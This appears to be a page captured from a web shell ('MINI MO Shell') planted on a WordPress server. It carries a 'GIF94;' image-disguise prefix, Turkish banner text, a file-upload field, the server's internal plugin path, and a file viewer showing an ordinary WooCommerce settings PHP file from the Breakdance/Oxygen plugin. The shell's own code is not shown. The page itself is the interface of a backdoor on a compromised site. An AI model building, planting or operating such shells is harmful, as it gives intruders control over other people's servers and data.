GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/woocommerce/settings/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/woocommerce/settings/base.php

<?php

namespace Breakdance\WooCommerce\Settings;

const BREAKDANCE_WOOCO_STYLES_FIELD = 'breakdance_settings_woocommerce_styles';

require_once __DIR__ . "/settings-tab.php";

/**
 * @return boolean
 */
function isWooIntegrationEnabled()
{
    if (!class_exists('woocommerce')) {
        return false;
    }

    // defaults to enabled
    $enabled = \Breakdance\Data\get_global_option(BREAKDANCE_WOOCO_STYLES_FIELD) !== 'disabled';

    return (bool) bdox_run_filters('breakdance_woo_integration_enabled', $enabled);
}

OHA YOOO - Tarih: 2026-08-03 22:07:57